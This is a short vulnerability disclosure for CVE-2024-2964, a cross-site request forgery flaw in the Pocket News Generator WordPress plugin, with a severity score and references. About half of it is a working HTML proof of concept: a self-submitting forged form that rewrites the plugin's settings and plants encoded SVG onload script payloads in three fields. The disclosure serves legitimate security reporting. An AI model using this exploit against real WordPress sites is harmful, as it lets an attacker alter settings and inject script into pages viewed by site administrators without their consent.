CVE-2024-2964

Description

The Pocket News Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.2.0. This is due to missing or incorrect nonce validation on the option_page() function. This makes it possible for unauthenticated attackers to update the plugin’s settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

Severity

5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Affected Version

<= 0.2.0

PoC :

<html>
  <!-- eneriiii<3-->
  <body>
    <form action="http://[ASSETS]/wp-admin/options-general.php?page=pocket_news_generator_options_page" method="POST">
      <input type="hidden" name="consumer&#95;key" value="eneriiiiiiiiiiii&lt;3&lt;&#33;&#45;&#45;&gt;&lt;Svg&#32;OnLoad&#61;&#40;confirm&#41;&#40;666&#41;&#45;&#45;&gt;&apos;&gt;" />
      <input type="hidden" name="access&#95;token" value="eneriiiiiiiiiiii&lt;3&lt;&#33;&#45;&#45;&gt;&lt;Svg&#32;OnLoad&#61;&#40;confirm&#41;&#40;666&#41;&#45;&#45;&gt;&apos;&gt;" />
      <input type="hidden" name="format" value="eneriiiiiiiiiiii&lt;3&lt;&#33;&#45;&#45;&gt;&lt;Svg&#32;OnLoad&#61;&#40;confirm&#41;&#40;666&#41;&#45;&#45;&gt;&apos;&gt;" />
      <input type="hidden" name="action" value="register" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Reference

https://plugins.trac.wordpress.org/browser/pocket-news-generator/trunk/pocket-news-generator.php#L77
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pocket-news-generator/pocket-news-generator-020-cross-site-request-forgery-to-settings-update
https://www.cve.org/CVERecord?id=CVE-2024-2964